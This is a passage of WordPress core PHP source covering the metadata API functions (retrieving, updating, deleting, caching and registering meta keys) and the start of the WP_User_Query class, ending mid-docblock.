ID. * @param string $meta_key Meta key. * @param mixed $meta_value Meta value. Must be serializable if non-scalar. * @param bool $delete_all Whether to delete the matching metadata entries * for all objects, ignoring the specified $object_id. * Default false. */ $check = apply_filters( "delete_{$meta_type}_metadata", null, $object_id, $meta_key, $meta_value, $delete_all ); if ( null !== $check ) { return (bool) $check; } $_meta_value = $meta_value; $meta_value = maybe_serialize( $meta_value ); $query = $wpdb->prepare( "SELECT $id_column FROM $table WHERE meta_key = %s", $meta_key ); if ( ! $delete_all ) { $query .= $wpdb->prepare( " AND $type_column = %d", $object_id ); } if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) { $query .= $wpdb->prepare( ' AND meta_value = %s', $meta_value ); } $meta_ids = $wpdb->get_col( $query ); if ( ! count( $meta_ids ) ) { return false; } if ( $delete_all ) { if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) { $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s AND meta_value = %s", $meta_key, $meta_value ) ); } else { $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s", $meta_key ) ); } } /** * Fires immediately before deleting metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 3.1.0 * * @param array $meta_ids An array of metadata entry IDs to delete. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "delete_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value ); // Old-style action. if ( 'post' == $meta_type ) { /** * Fires immediately before deleting metadata for a post. * * @since 2.9.0 * * @param array $meta_ids An array of post metadata entry IDs to delete. */ do_action( 'delete_postmeta', $meta_ids ); } $query = "DELETE FROM $table WHERE $id_column IN( " . implode( ',', $meta_ids ) . ' )'; $count = $wpdb->query( $query ); if ( ! $count ) { return false; } if ( $delete_all ) { foreach ( (array) $object_ids as $o_id ) { wp_cache_delete( $o_id, $meta_type . '_meta' ); } } else { wp_cache_delete( $object_id, $meta_type . '_meta' ); } /** * Fires immediately after deleting metadata of a specific type. * * The dynamic portion of the hook name, `$meta_type`, refers to the meta * object type (comment, post, term, or user). * * @since 2.9.0 * * @param array $meta_ids An array of deleted metadata entry IDs. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param mixed $_meta_value Meta value. */ do_action( "deleted_{$meta_type}_meta", $meta_ids, $object_id, $meta_key, $_meta_value ); // Old-style action. if ( 'post' == $meta_type ) { /** * Fires immediately after deleting metadata for a post. * * @since 2.9.0 * * @param array $meta_ids An array of deleted post metadata entry IDs. */ do_action( 'deleted_postmeta', $meta_ids ); } return true; } /** * Retrieve metadata for the specified object. * * @since 2.9.0 * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $object_id ID of the object metadata is for * @param string $meta_key Optional. Metadata key. If not specified, retrieve all metadata for * the specified object. * @param bool $single Optional, default is false. * If true, return only the first value of the specified meta_key. * This parameter has no effect if meta_key is not specified. * @return mixed Single metadata value, or array of values */ function get_metadata( $meta_type, $object_id, $meta_key = '', $single = false ) { if ( ! $meta_type || ! is_numeric( $object_id ) ) { return false; } $object_id = absint( $object_id ); if ( ! $object_id ) { return false; } /** * Filters whether to retrieve metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 3.1.0 * * @param null|array|string $value The value get_metadata() should return - a single metadata value, * or an array of values. * @param int $object_id Object ID. * @param string $meta_key Meta key. * @param bool $single Whether to return only the first value of the specified $meta_key. */ $check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, $single ); if ( null !== $check ) { if ( $single && is_array( $check ) ) { return $check[0]; } else { return $check; } } $meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' ); if ( ! $meta_cache ) { $meta_cache = update_meta_cache( $meta_type, array( $object_id ) ); $meta_cache = $meta_cache[ $object_id ]; } if ( ! $meta_key ) { return $meta_cache; } if ( isset( $meta_cache[ $meta_key ] ) ) { if ( $single ) { return maybe_unserialize( $meta_cache[ $meta_key ][0] ); } else { return array_map( 'maybe_unserialize', $meta_cache[ $meta_key ] ); } } if ( $single ) { return ''; } else { return array(); } } /** * Determine if a meta key is set for a given object * * @since 3.3.0 * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $object_id ID of the object metadata is for * @param string $meta_key Metadata key. * @return bool True of the key is set, false if not. */ function metadata_exists( $meta_type, $object_id, $meta_key ) { if ( ! $meta_type || ! is_numeric( $object_id ) ) { return false; } $object_id = absint( $object_id ); if ( ! $object_id ) { return false; } /** This filter is documented in wp-includes/meta.php */ $check = apply_filters( "get_{$meta_type}_metadata", null, $object_id, $meta_key, true ); if ( null !== $check ) { return (bool) $check; } $meta_cache = wp_cache_get( $object_id, $meta_type . '_meta' ); if ( ! $meta_cache ) { $meta_cache = update_meta_cache( $meta_type, array( $object_id ) ); $meta_cache = $meta_cache[ $object_id ]; } if ( isset( $meta_cache[ $meta_key ] ) ) { return true; } return false; } /** * Get meta data by meta ID * * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $meta_id ID for a specific meta row * @return object|false Meta object or false. */ function get_metadata_by_mid( $meta_type, $meta_id ) { global $wpdb; if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) { return false; } $meta_id = intval( $meta_id ); if ( $meta_id <= 0 ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $id_column = ( 'user' == $meta_type ) ? 'umeta_id' : 'meta_id'; /** * Filters whether to retrieve metadata of a specific type by meta ID. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 5.0.0 * * @param mixed $value The value get_metadata_by_mid() should return. * @param int $meta_id Meta ID. */ $check = apply_filters( "get_{$meta_type}_metadata_by_mid", null, $meta_id ); if ( null !== $check ) { return $check; } $meta = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $table WHERE $id_column = %d", $meta_id ) ); if ( empty( $meta ) ) { return false; } if ( isset( $meta->meta_value ) ) { $meta->meta_value = maybe_unserialize( $meta->meta_value ); } return $meta; } /** * Update meta data by meta ID * * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $meta_id ID for a specific meta row * @param string $meta_value Metadata value * @param string $meta_key Optional, you can provide a meta key to update it * @return bool True on successful update, false on failure. */ function update_metadata_by_mid( $meta_type, $meta_id, $meta_value, $meta_key = false ) { global $wpdb; // Make sure everything is valid. if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) { return false; } $meta_id = intval( $meta_id ); if ( $meta_id <= 0 ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $column = sanitize_key( $meta_type . '_id' ); $id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id'; /** * Filters whether to update metadata of a specific type by meta ID. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 5.0.0 * * @param null|bool $check Whether to allow updating metadata for the given type. * @param int $meta_id Meta ID. * @param mixed $meta_value Meta value. Must be serializable if non-scalar. * @param string|bool $meta_key Meta key, if provided. */ $check = apply_filters( "update_{$meta_type}_metadata_by_mid", null, $meta_id, $meta_value, $meta_key ); if ( null !== $check ) { return (bool) $check; } // Fetch the meta and go on if it's found. if ( $meta = get_metadata_by_mid( $meta_type, $meta_id ) ) { $original_key = $meta->meta_key; $object_id = $meta->{$column}; // If a new meta_key (last parameter) was specified, change the meta key, // otherwise use the original key in the update statement. if ( false === $meta_key ) { $meta_key = $original_key; } elseif ( ! is_string( $meta_key ) ) { return false; } $meta_subtype = get_object_subtype( $meta_type, $object_id ); // Sanitize the meta $_meta_value = $meta_value; $meta_value = sanitize_meta( $meta_key, $meta_value, $meta_type, $meta_subtype ); $meta_value = maybe_serialize( $meta_value ); // Format the data query arguments. $data = array( 'meta_key' => $meta_key, 'meta_value' => $meta_value, ); // Format the where query arguments. $where = array(); $where[ $id_column ] = $meta_id; /** This action is documented in wp-includes/meta.php */ do_action( "update_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value ); if ( 'post' == $meta_type ) { /** This action is documented in wp-includes/meta.php */ do_action( 'update_postmeta', $meta_id, $object_id, $meta_key, $meta_value ); } // Run the update query, all fields in $data are %s, $where is a %d. $result = $wpdb->update( $table, $data, $where, '%s', '%d' ); if ( ! $result ) { return false; } // Clear the caches. wp_cache_delete( $object_id, $meta_type . '_meta' ); /** This action is documented in wp-includes/meta.php */ do_action( "updated_{$meta_type}_meta", $meta_id, $object_id, $meta_key, $_meta_value ); if ( 'post' == $meta_type ) { /** This action is documented in wp-includes/meta.php */ do_action( 'updated_postmeta', $meta_id, $object_id, $meta_key, $meta_value ); } return true; } // And if the meta was not found. return false; } /** * Delete meta data by meta ID * * @since 3.3.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int $meta_id ID for a specific meta row * @return bool True on successful delete, false on failure. */ function delete_metadata_by_mid( $meta_type, $meta_id ) { global $wpdb; // Make sure everything is valid. if ( ! $meta_type || ! is_numeric( $meta_id ) || floor( $meta_id ) != $meta_id ) { return false; } $meta_id = intval( $meta_id ); if ( $meta_id <= 0 ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } // object and id columns $column = sanitize_key( $meta_type . '_id' ); $id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id'; /** * Filters whether to delete metadata of a specific type by meta ID. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 5.0.0 * * @param null|bool $delete Whether to allow metadata deletion of the given type. * @param int $meta_id Meta ID. */ $check = apply_filters( "delete_{$meta_type}_metadata_by_mid", null, $meta_id ); if ( null !== $check ) { return (bool) $check; } // Fetch the meta and go on if it's found. if ( $meta = get_metadata_by_mid( $meta_type, $meta_id ) ) { $object_id = (int) $meta->{$column}; /** This action is documented in wp-includes/meta.php */ do_action( "delete_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value ); // Old-style action. if ( 'post' == $meta_type || 'comment' == $meta_type ) { /** * Fires immediately before deleting post or comment metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (post or comment). * * @since 3.4.0 * * @param int $meta_id ID of the metadata entry to delete. */ do_action( "delete_{$meta_type}meta", $meta_id ); } // Run the query, will return true if deleted, false otherwise $result = (bool) $wpdb->delete( $table, array( $id_column => $meta_id ) ); // Clear the caches. wp_cache_delete( $object_id, $meta_type . '_meta' ); /** This action is documented in wp-includes/meta.php */ do_action( "deleted_{$meta_type}_meta", (array) $meta_id, $object_id, $meta->meta_key, $meta->meta_value ); // Old-style action. if ( 'post' == $meta_type || 'comment' == $meta_type ) { /** * Fires immediately after deleting post or comment metadata of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (post or comment). * * @since 3.4.0 * * @param int $meta_ids Deleted metadata entry ID. */ do_action( "deleted_{$meta_type}meta", $meta_id ); } return $result; } // Meta id was not found. return false; } /** * Update the metadata cache for the specified objects. * * @since 2.9.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $meta_type Type of object metadata is for (e.g., comment, post, term, or user). * @param int|array $object_ids Array or comma delimited list of object IDs to update cache for * @return array|false Metadata cache for the specified objects, or false on failure. */ function update_meta_cache( $meta_type, $object_ids ) { global $wpdb; if ( ! $meta_type || ! $object_ids ) { return false; } $table = _get_meta_table( $meta_type ); if ( ! $table ) { return false; } $column = sanitize_key( $meta_type . '_id' ); if ( ! is_array( $object_ids ) ) { $object_ids = preg_replace( '|[^0-9,]|', '', $object_ids ); $object_ids = explode( ',', $object_ids ); } $object_ids = array_map( 'intval', $object_ids ); /** * Filters whether to update the metadata cache of a specific type. * * The dynamic portion of the hook, `$meta_type`, refers to the meta * object type (comment, post, term, or user). Returning a non-null value * will effectively short-circuit the function. * * @since 5.0.0 * * @param mixed $check Whether to allow updating the meta cache of the given type. * @param array $object_ids Array of object IDs to update the meta cache for. */ $check = apply_filters( "update_{$meta_type}_metadata_cache", null, $object_ids ); if ( null !== $check ) { return (bool) $check; } $cache_key = $meta_type . '_meta'; $ids = array(); $cache = array(); foreach ( $object_ids as $id ) { $cached_object = wp_cache_get( $id, $cache_key ); if ( false === $cached_object ) { $ids[] = $id; } else { $cache[ $id ] = $cached_object; } } if ( empty( $ids ) ) { return $cache; } // Get meta info $id_list = join( ',', $ids ); $id_column = 'user' == $meta_type ? 'umeta_id' : 'meta_id'; $meta_list = $wpdb->get_results( "SELECT $column, meta_key, meta_value FROM $table WHERE $column IN ($id_list) ORDER BY $id_column ASC", ARRAY_A ); if ( ! empty( $meta_list ) ) { foreach ( $meta_list as $metarow ) { $mpid = intval( $metarow[ $column ] ); $mkey = $metarow['meta_key']; $mval = $metarow['meta_value']; // Force subkeys to be array type: if ( ! isset( $cache[ $mpid ] ) || ! is_array( $cache[ $mpid ] ) ) { $cache[ $mpid ] = array(); } if ( ! isset( $cache[ $mpid ][ $mkey ] ) || ! is_array( $cache[ $mpid ][ $mkey ] ) ) { $cache[ $mpid ][ $mkey ] = array(); } // Add a value to the current pid/key: $cache[ $mpid ][ $mkey ][] = $mval; } } foreach ( $ids as $id ) { if ( ! isset( $cache[ $id ] ) ) { $cache[ $id ] = array(); } wp_cache_add( $id, $cache[ $id ], $cache_key ); } return $cache; } /** * Retrieves the queue for lazy-loading metadata. * * @since 4.5.0 * * @return WP_Metadata_Lazyloader $lazyloader Metadata lazyloader queue. */ function wp_metadata_lazyloader() { static $wp_metadata_lazyloader; if ( null === $wp_metadata_lazyloader ) { $wp_metadata_lazyloader = new WP_Metadata_Lazyloader(); } return $wp_metadata_lazyloader; } /** * Given a meta query, generates SQL clauses to be appended to a main query. * * @since 3.2.0 * * @see WP_Meta_Query * * @param array $meta_query A meta query. * @param string $type Type of meta. * @param string $primary_table Primary database table name. * @param string $primary_id_column Primary ID column name. * @param object $context Optional. The main query object * @return array Associative array of `JOIN` and `WHERE` SQL. */ function get_meta_sql( $meta_query, $type, $primary_table, $primary_id_column, $context = null ) { $meta_query_obj = new WP_Meta_Query( $meta_query ); return $meta_query_obj->get_sql( $type, $primary_table, $primary_id_column, $context ); } /** * Retrieve the name of the metadata table for the specified object type. * * @since 2.9.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $type Type of object to get metadata table for (e.g., comment, post, term, or user). * @return string|false Metadata table name, or false if no metadata table exists */ function _get_meta_table( $type ) { global $wpdb; $table_name = $type . 'meta'; if ( empty( $wpdb->$table_name ) ) { return false; } return $wpdb->$table_name; } /** * Determines whether a meta key is considered protected. * * @since 3.1.3 * * @param string $meta_key Meta key. * @param string|null $meta_type Optional. Type of object metadata is for (e.g., comment, post, term, or user). * @return bool Whether the meta key is considered protected. */ function is_protected_meta( $meta_key, $meta_type = '' ) { $sanitized_key = preg_replace( "/[^\x20-\x7E\p{L}]/", '', $meta_key ); $protected = strlen( $sanitized_key ) > 0 && ( '_' === $sanitized_key[0] ); /** * Filters whether a meta key is considered protected. * * @since 3.2.0 * * @param bool $protected Whether the key is considered protected. * @param string $meta_key Meta key. * @param string|null $meta_type Type of object metadata is for (e.g., comment, post, term, or user). */ return apply_filters( 'is_protected_meta', $protected, $meta_key, $meta_type ); } /** * Sanitize meta value. * * @since 3.1.3 * @since 4.9.8 The `$object_subtype` parameter was added. * * @param string $meta_key Meta key. * @param mixed $meta_value Meta value to sanitize. * @param string $object_type Type of object the meta is registered to. * @param string $object_subtype Optional. The subtype of the object type. * * @return mixed Sanitized $meta_value. */ function sanitize_meta( $meta_key, $meta_value, $object_type, $object_subtype = '' ) { if ( ! empty( $object_subtype ) && has_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}" ) ) { /** * Filters the sanitization of a specific meta key of a specific meta type and subtype. * * The dynamic portions of the hook name, `$object_type`, `$meta_key`, * and `$object_subtype`, refer to the metadata object type (comment, post, term, or user), * the meta key value, and the object subtype respectively. * * @since 4.9.8 * * @param mixed $meta_value Meta value to sanitize. * @param string $meta_key Meta key. * @param string $object_type Object type. * @param string $object_subtype Object subtype. */ return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $meta_value, $meta_key, $object_type, $object_subtype ); } /** * Filters the sanitization of a specific meta key of a specific meta type. * * The dynamic portions of the hook name, `$meta_type`, and `$meta_key`, * refer to the metadata object type (comment, post, term, or user) and the meta * key value, respectively. * * @since 3.3.0 * * @param mixed $meta_value Meta value to sanitize. * @param string $meta_key Meta key. * @param string $object_type Object type. */ return apply_filters( "sanitize_{$object_type}_meta_{$meta_key}", $meta_value, $meta_key, $object_type ); } /** * Registers a meta key. * * It is recommended to register meta keys for a specific combination of object type and object subtype. If passing * an object subtype is omitted, the meta key will be registered for the entire object type, however it can be partly * overridden in case a more specific meta key of the same name exists for the same object type and a subtype. * * If an object type does not support any subtypes, such as users or comments, you should commonly call this function * without passing a subtype. * * @since 3.3.0 * @since 4.6.0 {@link https://core.trac.wordpress.org/ticket/35658 Modified * to support an array of data to attach to registered meta keys}. Previous arguments for * `$sanitize_callback` and `$auth_callback` have been folded into this array. * @since 4.9.8 The `$object_subtype` argument was added to the arguments array. * * @param string $object_type Type of object this meta is registered to. * @param string $meta_key Meta key to register. * @param array $args { * Data used to describe the meta key when registered. * * @type string $object_subtype A subtype; e.g. if the object type is "post", the post type. If left empty, * the meta key will be registered on the entire object type. Default empty. * @type string $type The type of data associated with this meta key. * Valid values are 'string', 'boolean', 'integer', and 'number'. * @type string $description A description of the data attached to this meta key. * @type bool $single Whether the meta key has one value per object, or an array of values per object. * @type string $sanitize_callback A function or method to call when sanitizing `$meta_key` data. * @type string $auth_callback Optional. A function or method to call when performing edit_post_meta, add_post_meta, and delete_post_meta capability checks. * @type bool $show_in_rest Whether data associated with this meta key can be considered public. * } * @param string|array $deprecated Deprecated. Use `$args` instead. * * @return bool True if the meta key was successfully registered in the global array, false if not. * Registering a meta key with distinct sanitize and auth callbacks will fire those * callbacks, but will not add to the global registry. */ function register_meta( $object_type, $meta_key, $args, $deprecated = null ) { global $wp_meta_keys; if ( ! is_array( $wp_meta_keys ) ) { $wp_meta_keys = array(); } $defaults = array( 'object_subtype' => '', 'type' => 'string', 'description' => '', 'single' => false, 'sanitize_callback' => null, 'auth_callback' => null, 'show_in_rest' => false, ); // There used to be individual args for sanitize and auth callbacks $has_old_sanitize_cb = false; $has_old_auth_cb = false; if ( is_callable( $args ) ) { $args = array( 'sanitize_callback' => $args, ); $has_old_sanitize_cb = true; } else { $args = (array) $args; } if ( is_callable( $deprecated ) ) { $args['auth_callback'] = $deprecated; $has_old_auth_cb = true; } /** * Filters the registration arguments when registering meta. * * @since 4.6.0 * * @param array $args Array of meta registration arguments. * @param array $defaults Array of default arguments. * @param string $object_type Object type. * @param string $meta_key Meta key. */ $args = apply_filters( 'register_meta_args', $args, $defaults, $object_type, $meta_key ); $args = wp_parse_args( $args, $defaults ); $object_subtype = ! empty( $args['object_subtype'] ) ? $args['object_subtype'] : ''; // If `auth_callback` is not provided, fall back to `is_protected_meta()`. if ( empty( $args['auth_callback'] ) ) { if ( is_protected_meta( $meta_key, $object_type ) ) { $args['auth_callback'] = '__return_false'; } else { $args['auth_callback'] = '__return_true'; } } // Back-compat: old sanitize and auth callbacks are applied to all of an object type. if ( is_callable( $args['sanitize_callback'] ) ) { if ( ! empty( $object_subtype ) ) { add_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'], 10, 4 ); } else { add_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'], 10, 3 ); } } if ( is_callable( $args['auth_callback'] ) ) { if ( ! empty( $object_subtype ) ) { add_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'], 10, 6 ); } else { add_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'], 10, 6 ); } } // Global registry only contains meta keys registered with the array of arguments added in 4.6.0. if ( ! $has_old_auth_cb && ! $has_old_sanitize_cb ) { unset( $args['object_subtype'] ); $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] = $args; return true; } return false; } /** * Checks if a meta key is registered. * * @since 4.6.0 * @since 4.9.8 The `$object_subtype` parameter was added. * * @param string $object_type The type of object. * @param string $meta_key The meta key. * @param string $object_subtype Optional. The subtype of the object type. * * @return bool True if the meta key is registered to the object type and, if provided, * the object subtype. False if not. */ function registered_meta_key_exists( $object_type, $meta_key, $object_subtype = '' ) { $meta_keys = get_registered_meta_keys( $object_type, $object_subtype ); return isset( $meta_keys[ $meta_key ] ); } /** * Unregisters a meta key from the list of registered keys. * * @since 4.6.0 * @since 4.9.8 The `$object_subtype` parameter was added. * * @param string $object_type The type of object. * @param string $meta_key The meta key. * @param string $object_subtype Optional. The subtype of the object type. * @return bool True if successful. False if the meta key was not registered. */ function unregister_meta_key( $object_type, $meta_key, $object_subtype = '' ) { global $wp_meta_keys; if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) { return false; } $args = $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ]; if ( isset( $args['sanitize_callback'] ) && is_callable( $args['sanitize_callback'] ) ) { if ( ! empty( $object_subtype ) ) { remove_filter( "sanitize_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['sanitize_callback'] ); } else { remove_filter( "sanitize_{$object_type}_meta_{$meta_key}", $args['sanitize_callback'] ); } } if ( isset( $args['auth_callback'] ) && is_callable( $args['auth_callback'] ) ) { if ( ! empty( $object_subtype ) ) { remove_filter( "auth_{$object_type}_meta_{$meta_key}_for_{$object_subtype}", $args['auth_callback'] ); } else { remove_filter( "auth_{$object_type}_meta_{$meta_key}", $args['auth_callback'] ); } } unset( $wp_meta_keys[ $object_type ][ $object_subtype ][ $meta_key ] ); // Do some clean up if ( empty( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) { unset( $wp_meta_keys[ $object_type ][ $object_subtype ] ); } if ( empty( $wp_meta_keys[ $object_type ] ) ) { unset( $wp_meta_keys[ $object_type ] ); } return true; } /** * Retrieves a list of registered meta keys for an object type. * * @since 4.6.0 * @since 4.9.8 The `$object_subtype` parameter was added. * * @param string $object_type The type of object. Post, comment, user, term. * @param string $object_subtype Optional. The subtype of the object type. * @return array List of registered meta keys. */ function get_registered_meta_keys( $object_type, $object_subtype = '' ) { global $wp_meta_keys; if ( ! is_array( $wp_meta_keys ) || ! isset( $wp_meta_keys[ $object_type ] ) || ! isset( $wp_meta_keys[ $object_type ][ $object_subtype ] ) ) { return array(); } return $wp_meta_keys[ $object_type ][ $object_subtype ]; } /** * Retrieves registered metadata for a specified object. * * The results include both meta that is registered specifically for the * object's subtype and meta that is registered for the entire object type. * * @since 4.6.0 * * @param string $object_type Type of object to request metadata for. (e.g. comment, post, term, user) * @param int $object_id ID of the object the metadata is for. * @param string $meta_key Optional. Registered metadata key. If not specified, retrieve all registered * metadata for the specified object. * @return mixed A single value or array of values for a key if specified. An array of all registered keys * and values for an object ID if not. False if a given $meta_key is not registered. */ function get_registered_metadata( $object_type, $object_id, $meta_key = '' ) { $object_subtype = get_object_subtype( $object_type, $object_id ); if ( ! empty( $meta_key ) ) { if ( ! empty( $object_subtype ) && ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) { $object_subtype = ''; } if ( ! registered_meta_key_exists( $object_type, $meta_key, $object_subtype ) ) { return false; } $meta_keys = get_registered_meta_keys( $object_type, $object_subtype ); $meta_key_data = $meta_keys[ $meta_key ]; $data = get_metadata( $object_type, $object_id, $meta_key, $meta_key_data['single'] ); return $data; } $data = get_metadata( $object_type, $object_id ); if ( ! $data ) { return array(); } $meta_keys = get_registered_meta_keys( $object_type ); if ( ! empty( $object_subtype ) ) { $meta_keys = array_merge( $meta_keys, get_registered_meta_keys( $object_type, $object_subtype ) ); } return array_intersect_key( $data, $meta_keys ); } /** * Filter out `register_meta()` args based on a whitelist. * `register_meta()` args may change over time, so requiring the whitelist * to be explicitly turned off is a warranty seal of sorts. * * @access private * @since 4.6.0 * * @param array $args Arguments from `register_meta()`. * @param array $default_args Default arguments for `register_meta()`. * * @return array Filtered arguments. */ function _wp_register_meta_args_whitelist( $args, $default_args ) { return array_intersect_key( $args, $default_args ); } /** * Returns the object subtype for a given object ID of a specific type. * * @since 4.9.8 * * @param string $object_type Type of object to request metadata for. (e.g. comment, post, term, user) * @param int $object_id ID of the object to retrieve its subtype. * @return string The object subtype or an empty string if unspecified subtype. */ function get_object_subtype( $object_type, $object_id ) { $object_id = (int) $object_id; $object_subtype = ''; switch ( $object_type ) { case 'post': $post_type = get_post_type( $object_id ); if ( ! empty( $post_type ) ) { $object_subtype = $post_type; } break; case 'term': $term = get_term( $object_id ); if ( ! $term instanceof WP_Term ) { break; } $object_subtype = $term->taxonomy; break; case 'comment': $comment = get_comment( $object_id ); if ( ! $comment ) { break; } $object_subtype = 'comment'; break; case 'user': $user = get_user_by( 'id', $object_id ); if ( ! $user ) { break; } $object_subtype = 'user'; break; } /** * Filters the object subtype identifier for a non standard object type. * * The dynamic portion of the hook, `$object_type`, refers to the object * type (post, comment, term, or user). * * @since 4.9.8 * * @param string $object_subtype Empty string to override. * @param int $object_id ID of the object to get the subtype for. */ return apply_filters( "get_object_subtype_{$object_type}", $object_subtype, $object_id ); } /** * User API: WP_User_Query class * * @package WordPress * @subpackage Users * @since 4.4.0 */ /** * Core class used for querying users. * * @since 3.1.0 * * @see WP_User_Query::prepare_query() for information on accepted arguments. */ class WP_User_Query { /** * Query vars, after parsing * * @since 3.5.0 * @var array */ public $query_vars = array(); /** * List of found user ids * * @since 3.1.0 * @var array */ private $results; /** * Total number of found users for the current query * * @since 3.1.0 * @var int */ private $total_users = 0; /** * Metadata query container. * * @since 4.2.0 * @var WP_Meta_Query */ public $meta_query = false; /** * The SQL query used to fetch matching users. * * @since 4.4.0 * @var string */ public $request; private $compat_fields = array( 'results', 'total_users' ); // SQL clauses public $query_fields; public $query_from; public $query_where; public $query_orderby; public $query_limit; /** * PHP5 constructor. * * @since 3.1.0 * * @param null|string|array $query Optional. The query variables. */ public function __construct( $query = null ) { if ( ! empty( $query ) ) { $this->prepare_query( $query ); $this->query(); } } /** * Fills in missing query variables with default values. * * @since 4.4.0 * * @param array $args Query vars, as passed to `WP_User_Query`. * @return array Complete query variables with undefined ones filled in with defaults. */ public static function fill_query_vars( $args ) { $defaults = array( 'blog_id' => get_current_blog_id(), 'role' => '', 'role__in' => array(), 'role__not_in' => array(), 'meta_key' => '', 'meta_value' => '', 'meta_compare' => '', 'include' => array(), 'exclude' => array(), 'search' => '', 'search_columns' => array(), 'orderby' => 'login', 'order' => 'ASC', 'offset' => '', 'number' => '', 'paged' => 1, 'count_total' => true, 'fields' => 'all', 'who' => '', 'has_published_posts' => null, 'nicename' => '', 'nicename__in' => array(), 'nicename__not_in' => array(), 'login' => '', 'login__in' => array(), 'login__not_in' => array(), ); return wp_parse_args( $args, $defaults ); } /** * Prepare the query variables. * * @since 3.1.0 * @since 4.1.0 Added the ability to order by the `include` value. * @since 4.2.0 Added 'meta_value_num' support for `$orderby` parameter. Added multi-dimensional array syntax * for `$orderby` parameter. * @since 4.3.0 Added 'has_published_posts' parameter. * @since 4.4.0 Added 'paged', 'role__in', and 'role__not_in' parameters. The 'role' parameter was updated to * permit an array or comma-separated list of values. The 'number' parameter was updated to support * querying for all users with using -1. * @since 4.7.0 Added 'nicename', 'nicename__in', 'nicename__not_in', 'login', 'login__in', * and 'login__not_in' parameters. * * @global wpdb $wpdb WordPress database abstraction object. * @global int $blog_id * * @param string|array $query { * Optional. Array or string of Query parameters. * * @type int $blog_id The site ID. Default is the current site. * @type string|array $role An array or a comma-separated list of role names that users must match * to be included in results. Note that this is an inclusive list: users * must match *each* role. Default empty. * @type array $role__in An array of role names. Matched users must have at least one of these * roles. Default empty array. * @type array $role__not_in An array of role names to exclude. Users matching one or more of these * roles will not be included in results. Default empty array. * @type string $meta_key User meta key. Default empty. * @type string $meta_value User meta value. Default empty. * @type string $meta_compare Comparison operator to test the `$meta_value`. Accepts '=', '!=', * '>', '>=', '<', '<=', 'LIKE', 'NOT LIKE', 'IN', 'NOT IN', * 'BETWEEN', 'NOT BETWEEN', 'EXISTS', 'NOT EXISTS', 'REGEXP', * 'NOT REGEXP', or 'RLIKE'. Default '='. * @type array $include An array of user IDs to include. Default empty array. * @type array $exclude An array of user IDs to exclude. Default empty array. * @type string $search Search keyword. Searches for possible string matches on columns. * When `$search_columns` is left empty, it tries to determine which * column to search in based on search string. Default empty. * @type array $search_columns Array of column names to be searched. Accepts 'ID', 'login', * 'nicename', 'email', 'url'. Default empty array. * @type string|array $orderby Field(s) to sort the retrieved users by. May be a single value, * an array of values, or a multi-dimensional array with fields as * keys and orders ('ASC' or 'DESC') as values. Accepted values are * 'ID', 'display_name' (or 'name'), 'include', 'user_login' * (or 'login'), 'login__in', 'user_nicename' (or 'nicename'), * 'nicename__in', 'user_email (or 'email'), 'user_url' (or 'url'), * 'user_registered' (or 'registered'), 'post_count', 'meta_value', * 'meta_value_num', the value of `$meta_key`, or an array key of * `$meta_query`. To use 'meta_value' or 'meta_value_num', `$meta_key` * must be also be defined. 